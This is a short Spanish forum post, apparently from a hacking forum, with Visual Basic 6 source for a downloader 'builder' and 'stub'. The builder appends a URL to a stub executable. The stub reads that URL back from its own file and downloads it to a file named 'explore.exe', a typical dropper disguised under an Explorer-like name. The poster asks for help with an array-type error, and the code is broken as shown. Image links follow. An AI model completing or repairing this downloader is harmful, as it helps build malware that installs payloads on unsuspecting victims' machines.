Cliente:
Private Sub Command1_Click()
Dim url As String
Open App.Path & "\stub" For Binary As 1
Dim stub As String
stub = Space(LOF(1))
Get 1, , stub
Close 1
Open App.Path & "\final.exe" For Binary As 1
Put 1, , stub & "xpro"
Dim texto As String
texto = Text1.Text
Put 1, , texto & "xpro"
Close 1
MsgBox " termino "
End Sub
**********************************************************************
Stub:
Private Sub Form_Load()
Dim des As String
Open App.Path & "\" & App.EXEName & ".exe" For Binary As 1
Dim stub As String
stub = Space(LOF(1))
Get 1, , stub
Close 1
Dim vars As String
vars = Split(stub, "xpro")
Dim url As String
url = Trim(vars(1))
des 0, Trim(url), App.Path & "\explore.exe", 0, 0
End Sub
Y me da error de se esperaba una matriz y señala la palabra " vars" y no entiendo porque xD

http://img844.imageshack.us/img844/8088/mujerrara.jpg
http://img715.imageshack.us/img715/5813/tigree.png
http://img830.imageshack.us/img830/6484/camaleon.png
http://img839.imageshack.us/img839/4944/tigrev2.jpg
http://img843.imageshack.us/img843/443/spidermanxn.png
http://www.youtube.com/watch?v=wHYYkciIKE0